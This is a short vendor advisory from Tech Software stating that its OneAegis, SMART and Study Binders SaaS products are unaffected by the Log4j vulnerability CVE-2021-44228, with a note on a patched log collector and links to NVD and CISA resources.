What is this document?
This document exists to document the impact of (or lack thereof) CVE-2021-44228 on Tech Software's OneAegis (f/k/a IRBManager), SMART, and Study Binders SaaS solutions.
What's the problem?
NVD - CVE-2021-44228 (nist.gov) is a critical vulnerability in the common log4j (i.e. "Log For Java") logging framework announced 10 Dec 2021, and has a based criticality score of 10 (out of 10!)
In short -- Our solutions are not impacted by this vulnerability.
Tech Software uses the Microsoft .Net programming stack for our development efforts, as such while we do using logging frameworks, we do not use log4j, nor does the .Net stack support JNDI, the underlying technology that makes this vulnerability a problem.
One of our back-end infrastructure tools, specifically Sumo Logic's log collection tool, which we use for log aggregation and security event monitoring, did use an impacted version of log4j, however in our use case this would not have resulted in a problem. Additionally, we have patched all servers to an updated version of the collector that is not impacted.
We continue to monitor our log files for any indicators of compromise and are confident we are not adversely affected by this vulnerability.
|Overview of issue||NVD - CVE-2021-44228 (nist.gov)|
|Cybersecurity & Infrastructure Security Agency (CISA) List of impacted software||cisagov/log4j-affected-db (github.com)|
|CISA Guidance||Apache Log4j Vulnerability Guidance | CISA|
|GitHub Pull Request to add Tech Software to CISA Product List||Add Tech Software products by WaldenL · Pull Request #124 · cisagov/log4j-affected-db (github.com)|